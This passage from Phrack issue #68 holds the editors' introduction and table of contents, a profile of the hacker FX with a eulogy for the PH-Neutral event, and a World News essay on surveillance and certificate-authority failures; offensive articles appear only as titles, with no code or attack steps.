Phrack #68

EDB-ID:

42879

CVE:

N/A

Author:

phrack

Type:

papers

Platform:

Magazine

Published:

2012-04-14

                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x01 of 0x13

|=-----------------------------------------------------------------------=|
|=-------------------------=[ Introduction ]=----------------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------=[ by the Phrack staff ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[  April 14, 2012  ]=-------------------------=|
|=-----------------------------------------------------------------------=|


              "C is quirky, flawed, and an enormous success."
                                   -- Dennis Ritchie

October 2011, a legend has fallen...

                         _____.______.______._____
                         \`\                   /'/
                          \ |                 | /
                           >|___,____,____,___|<
                          /d$$$P ,ssssssssssss. \
                         /d$$$P ,d$$$$$$$$$$$$$b \
                        <=====w======w======w=====>
                         \ \____> \_____/ <____/ /
                          \_____________________/ pb


Dennis Ritchie, proud father of nothing less than our beloved C language
and UNIX operating system, is gone. While the world has been crying over
the loss of Steve Jobs, little has been written about Dennis' death. Saying
that his inventions influenced the hacking community in a way even he
probably never knew is _not_ an exaggeration. Think about it: how many of
us became hackers because we discovered C, related bugs or UNIX?

Dennis, the world might not be aware of your unbelievable contribution but
we are. Farewell dear friend, may you rest in peace.

                                        -- anonymous bug hunter


                        -----( Dark Thoughts )-----

Today I woke up thinking about the death of this Chinese little girl [1]. I
felt bad. It's true that watching the youtube video was disturbing but
something kept hitting my mind. What if the incident had occurred in my
country?  Would people really have behaved any differently? I have doubts.
Just because a video leaked on the Internet people conveniently blamed
China, a country both controverted and feared.

What if the modern society in general was tending to slowly become amoral
and cold? A proof is that we all watched this video fully aware of its
content. Vicious, aren't we? But not only that. We're also fucking cowards.
Suddenly discovering that there is a darkness hidden inside the very roots
of our society is dramatic. But pretending to ignore the fact that there
are countries in this world where atrocious massacres are part of the daily
life seems fine.

It was written in the US Declaration of Independence that "We hold these
truths to be self-evident, that all men are created equal [...]". How could
that possibly be true? This morning I was at home, healthy, comfortably
sitting in front of my computer screen, with a cup of coffee in hand. A few
minutes later, I was working (or luxuriously pretending to be) to earn
money that I spent in the bar that night with my friends. In the mean time,
not so far away, people were killed, raped, mutilated. The truth is that I
don't even care when I think about it. This morning I was pretending being
concerned for other people, but tonight I don't give a shit anymore.

Something must be wrong.

                                    -- anonymous coward / Phrack


[1] http://www.chinapost.com.tw/china/national-news/2011/10/21/320549/
    Chinese-girl.htm


                      -----( Phrack Issue #68 )-----

Hello Phrackers! How are you guys doing? We hope well. We hope your latest
exploit works reliably (again) and all your bounces are alive and pinging.
We also hope you and your friends still are out of prison, or recently came
out (wink wink). Us, we're doing good. Looks like we did it again and a new
release is here. Ya-hoo.

This release brings you an amazing selection of hacking goodies. We have
two papers on applied cryptanalysis by greg and SysK, an area in which we
hope to see more submissions for the next issues. We are also thrilled
about the return of the Art of Exploitation section. And what a return; we
have for you not one, but two detailed papers demonstrating that
exploitation is indeed an art form. Speaking of exploitation, did you ever
wonder what Firefox, FreeBSD and NetBSD have in common? Read the paper by
argp & huku and find out. Are you hacking Windows' farms? Be sure to check
the p1ckp0ck3t's novel approach of stealing Active Directory password
hashes. Perhaps you prefer malware analysis and identification of malware
families; Pouik and G0rfi3ld have written a paper with a focus on Android
malware that will satisfy you. Android is quickly becoming the standard
mobile platform. I think it's time for an Android/ARM kernel rootkit. Start
from dong-hoon you's paper and hack your own. styx^ continues the kernel
fun with a paper that updates truff's LKM infection techniques to 2.6.x and
3.x Linux kernels. If for whatever reason you're afraid of messing with
your kernels, Crossbower shows you how to create a stealthy userland
backdoor without creating new processes or threads.

We also believe that you will find merit with the two main non technical
papers of this issue. Both address more or less the same topics, but from
two totally different points of view. On one hand, we have an analysis of
how the happiness that hacking brings to all of us can and is corrupted by
the security industry. One the other, a call to all hackers to take a side
between staying true to the spirit of hacking and selling out to the
military intelligence industrial complex. Read them, think about them and
take a side. Remember, "The hottest places in hell are reserved for those
who in times of great moral crisis maintain their neutrality".

Phrack World News is also making a comeback, courtesy of TCLH. In
International Scenes we explore Korea and the past of the Greek scene.
Loopback has increased and we decided to resurrect Linenoise as we had some
tiny but not less interesting submissions. While being eligible for an
issue remains hard, submitting for Linenoise may be an easier way for
people to share tricks in the next issues.

We are proud to have FX prophiled in this epic issue. As an added gift, FX
wrote a eulogy for PH-Neutral, at least in its original form. PH-Neutral,
as all great hacker creations, lives on as long as the hackers behind it
are fueling it with their passion.

Speaking of hacker passion, this issue re-establishes a long lost
connection. Phrack and SummerCon are again bonded on the 25th anniversary
of SummerCon! Shmeck and redpantz, representing SummerCon, contribute two
papers; a history of the conference from its beginning in 1987 to this
year, and of course one of the Art of Exploitation papers.

Believe it or not it was _fucking_ hard to prepare this issue. It's no news
that the mentality of the hacking community has changed, but this time we
had to face multiple deceptions. It's not the first time, however the 
quantity makes this event scary. It demonstrates how rotten and corrupted 
the so-called spirit of some people pretending to be part of the 
underground has become.

There's a time when you realize that you've lost count of the battles you
lost, but you still kinda won enough to keep faith. More importantly, you
realize that you still care. Granted, it's not the deep, mystical and life
changing moment that movies display -- the huge pile of shit you pushed out
of the door just before getting to sleep is still there. It maybe just
stinks a little less.

But we care, hell, we really care about Phrack and what it means. It costs
time and frustration, many battles lost, it faces the two-point-oh
revolution (lots of quality stuff goes into blogs, for immediate
consumption) and the money drop by the security industry, but the
satisfaction of seeing it out again is huge. Yes, we care.

And that's not just because we're a bunch of old farts that stay attached
to the past. We care because it's a constant, maybe feeble but constant,
heartbeat of that world, that community that we grew up and now live in.
You know, that little thing called 'the Underground' that we are proud and
honored to somehow, in part, represent.

We've heard from many corners that 'the Underground' is dead. We'd love to
hear those people describe what the Underground is, then. Sure, things
change, evolve. Laws, computing power, money invested, political links,
technology, every piece moves fast and reshapes the landscape. But if
you're reading these lines today, if you've just finished a 36-hour
coding, hacking marathon, you're keeping it alive.

So thank you, for that. Thank you to the authors for finding the time of
sharing their knowledge. Thank you to anyone that setups a new connection.
Thank you to whomever fights for information and freedom. Thanks crews.

Happy hacking, Phrackers.
You guys are the BEST heartbeat in the world.


                                    -- the Phrack staff


 ______  _     _ ______          ______ _    _      __  _      __   _____
(_____ \| |   | (_____ \   /\   / _____) |  / )   _|  || |_   / /  / ___ \
 _____) ) |__ | |_____) ) /  \ | /     | | / /   (_   ||  _) / /_ ( (   ) )
|  ____/|  __)| (_____ ( / /\ \| |     | |< <     _|  || |_ / __ \ > > < <
| |     | |   | |     | | |__| | \_____| | \ \   (_   ||  _| (__) | (___) )
|_|     |_|   |_|     |_|______|\______)_|  \_)    |__||_|  \____/ \_____/


                 - By the community, for the community. -


$ cat p68/index.txt

<--------------------------( Table of Contents )-------------------------->

 0x01  Introduction ...................................... Phrack Staff

 0x02  Phrack Prophile on FX ............................. Phrack Staff

 0x03  Phrack World News ................................. TCLH

 0x04  Linenoise ......................................... various

 0x05  Loopback .......................................... Phrack Staff

 0x06  Android Linux Kernel Rootkit ...................... dong-hoon you

 0x07  Happy Hacking ..................................... Anonymous

 0x08  Practical cracking of white-box implementations ... SysK

 0x09  Single Process Parasite ........................... Crossbower

 0x0a  Pseudomonarchia jemallocum ........................ argp & huku

 0x0b  Infecting loadable kernel modules ................. styx^

 0x0c  The Art of Exploitation:
       MS IIS 7.5 Remote Heap Overflow ................... redpantz

 0x0d  The Art of Exploitation:
       Exploiting VLC, a jemalloc case study ............. huku & argp

 0x0e  Secure Function Evaluation vs. Deniability in OTR
       and similar protocols ............................. greg

 0x0f  Similarities for Fun and Profit ................... Pouik & G0rfi3ld

 0x10  Lines in the Sand: Which Side Are You On in the
       Hacker Class War .................................. Anonymous

 0x11  Abusing Netlogon to steal an Active Directory's
       secrets ........................................... the p1ckp0ck3t
 
 0x12  25 Years of SummerCon ............................. Shmeck

 0x13  International Scenes .............................. various

<------------------------------------------------------------------------->


                    -----( GreetZ for issue #68 )-----

    - FX:                            epicness personified
    - herm1t:                        you have our support
    - TCLH:                          for everything
    - x82:                           deepest apologies for the 1 year wait
    - anonymous authors:             best part of this issue
    - sysk:                          keep submitting man!
    - redpantz & Shmeck:             Phrack and SummerCon bonded again
    - greg:                          schooling Alice and Bob
    - Crossbower:                    parasite zoologist
    - the p1ckp0ck3t:                be wary or he will get your hashes
    - huku & argp:                   the scourge of memory allocators
    - styx^:                         yes we are hardcore reviewers
    - Pouik & G0rfi3ld:              who the hell is G0rfi3ld??? ;>
    - scene phile writers:           you have big balls guyz
    - linenoise writers:             Eva you're soooooooo cute :3
    - our generous hoster:           a contribution not forgotten ;)
    - z4ppy, ender:                  external reviews are paid in beers
    - b3n:                           too bad we didn't use your stuff
    - No greetz, no thankz to:       you know who you are :<

       And of course many thanks to the loopback contributors :')


                  -----( Phrack Magazine's policy )-----

phrack:~# head -n 22 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate.  When possible,
 *  all facts are checked, all code is compiled.  However, we are not
 *  omniscient (hell, we don't even get paid).  It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein.  Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass.  We neither advocate, condone nor participate
 *  in any sort of illicit behavior.  But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */

                  -----( Contact Phrack Magazine )-----


            <  Editors           : staff[at]phrack{dot}org   >
            >  Submissions       : staff[at]phrack{dot}org   <
            <  Commentary        : loopback[@]phrack{dot}org >
            >  Phrack World News : pwned[at]phrack{dot}org   <


    Submissions may be encrypted with the following PGP key:
    (Hint: Always use the PGP key from the latest issue)


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PHRACK

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
=cK7U
-----END PGP PUBLIC KEY BLOCK-----

                            -----( EOF )-----


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x02 of 0x13

|=-----------------------------------------------------------------------=|
|=------------------------=[ PHRACK PROPHILE ON ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[  FX of Phenoelit   ]=-----------------------=|
|=-----------------------------------------------------------------------=|

|=---=[ Specifications

           Handle: FX
              AKA: 41414141
    Handle origin: First and last letter of my first name
                   (I had no idea it had a meaning in movie production)
      Produced in: East Germany
             Urlz: http://www.phenoelit.de/
        Computers: Metric tons of them
       Creator of: much crappy and useless code
        Member of: Phenoelit, Toolcrypt
         Projects: PH-Neutral, Phonoelit
            Codez: IRPAS (bunch of tools that somehow still cause havoc)
                   cd00r.c (later called PortKnocking by the copycats)
                   works-on-my-machine exploits
     Active since: late 80s
   Inactive since: unlikely to happen

|=---=[ Favorites

          Actors: don't care
           Films: Hackers (1995) - imagine it actually would be like that
         Authors: Neal Stephenson, Iain M. Banks, Frank & Brian Herbert
        Meetings: Bars
             Sex: ACK
           Books: Computer Security, Time-Life Books (1986), and it began
           Novel: too many to list
           Music: Progressive House Kitsch
         Alcohol: Oh Yes!
            Cars: Mercedes-Benz
           Girls: SYN
           Foods: German
          I like: honesty, pragmatism, realism, tolerance, style, empathy
       I dislike: fakes, aggression, ignorance, senselessness, deception

|=---=[ Describe your life in 3 sentences

Every work day is packed with challenges, great hacks and awesome people.
Every free day compensates with non-security hobbies and sleep.
This sentence is padding.

|=---=[ First contact with computers

At the age of 6 at the computing department of the university of Sofia,
Bulgaria. Didn't leave much of an impression, as I was only allowed to play
a silly game (in CGA color).

Second contact happened at the age of 9 or 10, a Robotron Z9001. It came
without software but with a typewriter made programming manual for BASIC.
I read it cover to cover.

|=---=[ Passions: What makes you tick

Like-minded people: Conversations give me the greatest boost. Let me 
explain something to a person who gets it, and I will have a new idea how
to take it further.

Also, work. That state of a problem where it is no longer fun, but actual
work, to get it where you want it. Not letting go. Stubbornness compensates
for a lot of talent.

|=---=[ Unix or Windows? Juniper or Cisco?

Unix and Windows. I like both, I use both, they both suck in their own
ways. The only thing you will not see me with is anything Apple.

Juniper, Cisco, all networking equipment is broken, Cisco being in the
lead. How can you sell equipment that is in most cases simply forwarding
IPv4 packets from interface 1 to interface 2 since 1987 and still crash on
parsing IPv4 in 2011?

|=---=[ Color of hat?

undef($hat);

|=---=[ Entrance in the underground

First contact must have been around 1990. Shortly after the Berlin wall
came down, I got my first 80286 machine and hung out at a computer club in
a Thaelmann Pionieers' (youth organization of schoolchildren in East
Germany) youth center. In a back room, two older guys downloaded infrared
images from Russian satellites. While the download ran, they cracked PC
games for the kids to pass the time. First time I saw a hex dump.

I had the great honor to meet many people that I consider(ed) part of the
real underground. Some of them still are. But I don't think I was ever part
of that myself.

|=---=[ Which research have you done or which one gave you the most fun?

Anything I did was fun at the time, why doing it otherwise? I generally
like fiddling around with Bits and bytes more than hunting bugs in large
environments. Writing disassemblers, debuggers and the like is a pleasure.
It's also monkey work. But it lets you feel so much about the history and
design of a platform.

I also like network protocols, because you can often see the vulnerability
potential by reading the specifications already. Protocols are interfaces
and interfaces are where the bugs live. Also, logging functions love to use
packet contents and fixed buffers.

|=---=[ Personal general opinion about the underground

Much. Fucking. Respect.

Seriously, what is published is only the tip of an iceberg. Once you talk
to people, it's simply insane how much knowledge there is. Interestingly,
I have the impression that little of this knowledge is ever used.

One aspect often considered essential in the underground I dislike:
Owning people fails to impress me. It's like beating people up, everyone
can do that and none of it makes it an achievement. If you found that
vulnerability yourself and made a custom exploit, that's an achievement.

|=---=[ Personal general opinion about the German underground

Regardless of the definition of underground, the hacking scene in Germany
is very alive and diverse. However, I would love to see more of them
write exploits.

|=---=[ Personal general opinion about the European underground

The U.S. is much more visible, but Old Europe kicks their ass any time.
Just looking at the French scene is scary. If only they would speak
English ;) And don't even get me started on east Europe and Russia.

|=---=[ Memorable experiences/hacks

- Finding my first overflow in Cisco IOS TFTP, resisting the urge to post
  it immediately and deciding to write an exploit. Then realizing how much
  of a journey lay ahead of me, since I had never written any exploit
  before.

- Writing an exploit that needed to be stable, i.e. work in the wild. After
  weeks of frustration finally understanding that PoC is only 10% of
  exploit development. Halvar saving my ass again with a simple hint.

- Being asked by my employer to take the CISSP exam, being initially
  rejected due to my "connections to hackers" as a DEFCON speaker, being
  allowed to take the exam and finding a 12 octet MAC address in a
  question. Finding out afterwards that (ISC)2 probably has more admin
  users on their web servers than paying members.

- Asking someone to look at Cisco IOS exploitation after I spent about
  a decade with it and getting my ass kicked in less than a week. True
  talent trumps everything.

- Caesar's Challenge over the years: hearing about it, being invited in,
  being told by Caesar that he accepts my solution, welcoming Caesar to
  PH-Neutral.

- Being invited to train a team of hackers and later finding out that
  the whole purpose of the exercise was to cure them from their respect
  for me. And it worked.

- The nights in Wuxi (China) with the Wuxi Pwnage Team.

|=---=[ Memorable people you have met

- Halvar Flake
  I have to thank this man for a lot of things in my life.

- Sergey Bratus
  A great man with a great vision. He changed how I look at academia and
  hacking. With people like Sergey, there is hope.

- John Lambert
  One of the smartest men I've ever met. Just in case you wonder why
  Windows exploitation is so challenging today.

- Dan Kaminsky
  Dan and I share a passion for protocols. We first met in 2002, about five
  times, at cons all over the planet, and talked IP(v4). Good times.

- ADM, that one summer

|=---=| Memorable places you have been to

- Idaho Falls

|=---=[ Disappointing people you have met

Many manufactured or self-styled experts giving presentations at
conferences. If you didn't write or at least read the code in question,
shut up. The number of charlatans is unfortunately growing steadily.
Some would probably count me in that category as well.

Also, friends that betray they very people that trust them most.

|=---=[ Who came up with the name "Phenoelit" and what does it mean?

Nothing to see here, move on.

|=---=[ Who are you guys?

Just friends.

|=---=[ Who designed those awesome Phenoelit t-shirts?

I always did the designs for Phenoelit and PH-Neutral. I greatly enjoy
doing them. For PH-Neutral, the process was that I had to come up with a
motive and would do all the work, Mumpi watching me, drinking beer and
complaining. It would not have worked any other way.

|=---=[ Phenoelit vs 7350 vs THC?

We met 7350 and THC first time at the 17c3 and became friends with several
of them over time. I sincerely miss 7350, but their time had come.

|=---=[ Things you are proud of

The team I am blessed to work with.

|=---=[ Things you are not proud of

- Writing shitty exploits
- Having a pretty good hand at picking research topics that are not
  relevant to the real world
- Being strictly single-tasking

|=---=[ Most impressive hackers

- Dvorak
- Halvar Flake
- Philippe Biondi
- Ilja van Sprundel
- Anonpoet
- Greg
- Last Stage of Delirium

This list is biased by me not knowing many of the really impressive
hackers.

|=---=[ Opinion about security conferences

Security conferences have been essential for my personal development and I
still love to go to them. I have a preference for smaller cons, since it is
more likely to get to talk to people.
Almost any talk has something for me to take away. But more important is
the hallway track and going out with fellow hackers.

The distinction between hacker cons and corporate or product security
conferences used to be clear. It is no longer, which is sad.

|=---=[ Opinion on Phrack Magazine

IMHO one of the most well regarded e-zines in the world, influencing much
research over the time of its existence. Just look at how many academic
publications cite Phrack articles. Keep it up!

|=---=[ What you would like to see published in Phrack?

I think Phrack does just fine. For me, exploitation techniques are at
the heart of Phrack. I also enjoy reading about environments that not
many people have access to: control systems of all kinds, for example.

Maybe you should aim for more timely releases though.

|=---=[ Personal advices for the next generation

That implies that I'm old and expired, right?

The one advice I would give is: Don't care about the opinion of others when
it comes to research. It doesn't matter if they think it's cool, you must
think it's cool. Look for and credit prior art, build on what is there
already and have fun doing so.

And if you really have to use Python, understand that error handling is not
the same thing as stack traces. Catch your exceptions and handle them, or
at least display something useful.

|=---=[ Your opinion about the future of the underground

Predictions are hard, especially when they concern the future.

|=---=[ Shoutouts to specific (group of) peoples

To the hacker and vx groups of the 80s and 90s, who built the foundation
of everything we still concern ourselves with today.

|=---=[ Flames to specific (group of) peoples

To the snake-oil security product vendors, who refuse to innovate and bind
available talent in signature writing sweat jobs, because that model pays
them so well. Your "protections" add vulnerabilities to every aspect of
modern networks, and you know it. The halting problem is UNDECIDABLE!

|=---=[ Quotes

"Does it just look nice or is it correct?"
- zynamics developer about a control flow graph

"Nine out of the ten voices in my head say I'm not schizophrenic. The
other one hums the melody of Tetris."

|=---=[ Anything more you want to say

I would like to thank the Phrack staff for this honor, although I'm still
convinced there are 0x100 people who deserved it more.

                  |=---=[ A eulogy for PH-Neutral ]=---=|

We created PH-Neutral in 0x7d3 as an attempt to bring together the people
we respected most. We were simply unaware of the other small events that
already existed. The intention was to have an informal meeting with ad-hoc
workshops and a great party. We failed at the party, despite a full-blown
dance floor. However, the people actually worked together and discussed
their projects and exploits. We were sending out the invitations
individually by email and I was surprised about the many positive
reactions. We would not have thought that so many well-known and
interesting people would actually show up.

Over the years, the event grew. Although we kept it invite-only, the
mechanism for invitations had to consider people that were there in the
past as well as fresh blood. Therefore, one way or another, it had a snow
ball effect to it. But in the early years, this was a good thing. There
was an astonishing amount of innovation going on during the first five
years. We never expected to see people actually working together. It was
the time of sharing code and knowledge, of searching for JTAG on a dance
floor and of the Vista ASLR release.

The bigger the event got, the more the focus shifted from hacking to party.
Since that corresponded with our second initial goal, we did encourage it.
We really like to party with our friends, and by party we mean actual
dancing and not just standing around and getting drunk. It was amazing
to see how well the party developed over the years. Despite the growth,
it still had a very intimate feeling.

Initially meant as a joke during setup of the second PH-Neutral, we had
decided to not have it run forever. For one, we didn't want to see it going
down and fading away. When more and more conferences started to show up on
the map, it only encouraged us to conclude the story of PH-Neutral. It had
its time and place.

The last PH-Neutral 0x7db then proved that the decision was right. It was
that little bit of too many people that turns a large group of
international friends into a somewhat anonymous crowd. Although luckily
not many guests noticed, it changed the way we had to run the event
completely. Where in the years before, we could hack and party with our
friends, we had to fire-fight, manage and regulate. That was not the way it
was meant to be for us, so it was a good time to call it quits.

PH-Neutral was made into what it was by the people that participated, more
so than any other event I know. The people decided on the spin of each
year's event by how they filled the frame we gave them. It was their
party and they took it and made it great. Thank you forever!

[ EOF ]


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x03 of 0x13

|=-----------------------------------------------------------------------=|
|=------------------------=[ Phrack World News ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ by TCLH ]=------------------------------=|
|=-----------------------------------------------------------------------=|

It is been a while since the last Phrack World News, and much has happened
in our world since then. Governments have been overthrown [1], human rights
partially restored in one country, and taken away in the next [2]. The
so-called first world has been bought, delivers monitoring and suppression
equipment to totalitarian countries [3] as well as making its use a legal
requirement in their owni [4]. The content mafia, considering every form of
creative and work output their property, has declared war on all internet
citizen. No matter if picture, song, movie or academic paper, you shall pay
for its consumption or be banned from the net [5]. That they are actually
trying to resist evolution [6] is of no concern to them.

In times like that, where your network traffic may go though more deep
packet inspection engines than observable hops in traceroute, the hacker
shall reconsider his ways of communication. It is no longer enough to
SSH/VPN into one of your boxes and jump into your screen sessions, as the
communication of that box is monitored as much as your home network
connection.

Global surveillance is no longer stuff from science fiction books, or
attributed only to the most powerful secret services in the world. It
becomes a requirement for most ISPs to stay in business. They can either
sell you, or they can sell their company, and you can bet that the later is
not an option they consider.

Besides, traffic patterns of the average internet user change. We are
approaching a time when the ordinary user will only emit HTTP traffic with
his daily activities, making it easy for anyone interested to single out
the more creative minds, just by the fact that they still use protocols
like SSH, OpenVPN and IRC with their unmistakable signatures. It is up to
us to come up with new and creative ways of using this internet before
packets get dropped based on their protocol characteristics and we find
ourselves limited to Google+ and Facebook.

At the same time, the additional protections we have come to rely on prove
to be as bad as we always thought they might be. When breaking into a
certificate authority is as easy as it was with DigiNotar [7], when the
database of Comodo [8] ends up in BitTorrents, we are facing bigger
challenges than ever before. There are various discussions all over the net
on how to deal with the mess that is our common PKI.  From the IETF [9] to
nation states, everyone has their own ideas. When certificate authorities
are taken over by governments or forced to issue Sub-CA certificates to the
same [10], it's not a trust mechanism we shall rely on.

An attitude that this is someone else's problem doesn't help. As more and
more functions of daily life move online, everyone is exposed to these
problems. Even if you know how to spot certificate changes, you will still
need to access the web site. HTTPS doesn't provide a plan B option. The CA
nightmare calls for the gifted and smart people to work together and find a
long term dependable solution. This is the time where your talent, skills
and experience is required, unless you are fine with government and vendor
driven committees to "solve" it.

Meanwhile over at IRC's little pre-teen sister Twitter, whose attention
span is shorter than that of a fruit fly and easily bought, people hype
so-called solutions [11] to the problem without doubts.  Although their
heros abandon privacy solutions people depend on the moment someone waves a
little money in their face [12], the masses rather believe in a savior than
to think and evaluate for themselves.  Are you one of them?

Unquestioned believe becomes the new normal. Whether it is Google or Apple
fanboyism, the companies can do whatever they want. Apple ships products
with several year old vulnerabilities [13] in open source components they
reused and nobody notices. Everyone can make X.509 certificates that iPhone
and iPad will happily accept [14]? No problem.  Think back and consider the
shit storm if that would have been Microsoft. These companies feel so
invincible that Apple's App Store Guidelines [15] openly state: "If you run
to the press and trash us, it never helps."
Critical thinking seems to become a challenge when you get what you want.
Just look at how many hackers use Gmail without any end-to-end encryption,
because it just works. Thich hacker using a hotmail email address was ever
taken serious? Where is the difference?

What Apple and Google are for the hip generation, Symantec is for
governments and corporations. They are seen as the one company that will
protect us all. When the source code of PCAnywhere is leaked [16] and the
same company simply advises its users to no longer use that software
product [16], you get an idea of how they evaluate the security of it
themselves. And what about all the systems in daily life that depend on it?
If nobody used PCAnywhere, Symantec would have stopped selling it long ago.
Therefore, they simply left a large user base out in the cold.  And what
happens? Nothing. Except, maybe, that some have fun with various remote
access points.

It all comes down to knowledge. Knowledge cannot be obtained by believe.
Believe is a really bad substitute for actually knowing. And what is the
hacker community other than first and foremost the quest for knowledge that
you found out yourself by critically questioning everything put in front of
you. What you do with that knowledge is a question everyone has to answer
himself. But if we stop to learn, experiment and play, we stop being
hackers and become part of the masses. It is a sign of the times when only
very few hackers speak IPv6, leave alone use it. When you see more fuzzers
written than lines of code actually read, because coding up a simple
trash-generator is so much easier than actually understanding what the code
does and then precisely exploiting it.

The quest for knowledge defines us, not money or fame. Let's keep it up!


[1] https://en.wikipedia.org/wiki/Arab_spring
[2] https://en.wikipedia.org/wiki/2011%E2%80%932012_Syrian_uprising
[3] http://buggedplanet.info/index.php?title=EG
[4] https://en.wikipedia.org/wiki/Telecommunications_data_retention
[5] https://en.wikipedia.org/wiki/Three_strikes_%28policy%29
[6] http://www.wired.com/threatlevel/2012/02/peter-sunde/
[7] https://en.wikipedia.org/wiki/DigiNotar
[8] https://en.wikipedia.org/wiki/Comodo_Group#Breach_of_security
[9] http://www.ietf.org/mail-archive/web/therightkey/current/maillist.html
[10] https://bugzilla.mozilla.org/show_bug.cgi?id=724929
[11] https://en.wikipedia.org/wiki/Convergence_%28SSL%29
[12] https://en.wikipedia.org/wiki/Whisper_Systems#Acquisition_by_Twitter
[13] http://support.apple.com/kb/HT5005
[14] http://support.apple.com/kb/HT4824
[15] https://developer.apple.com/appstore/guidelines.html
[16] http://resources.infosecinstitute.com/pcanywhere-leaked-source-code/
[17] http://www.symantec.com/connect/sites/default/files/pcAnywhere
     %20Security%20Recommendations%20WP_01_23_Final.pdf


[ EOF ]


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x04 of 0x13

|=-----------------------------------------------------------------------=|
|=-----------------------=[  L I N E N O I S E  ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[     various     ]=-------------------------=|
|=-----------------------------------------------------------------------=|


Linenoise iz back! The last one was in Issue 0x3f (2005 ffs) and since we
had great short and sweet submissions we thought it was about time to
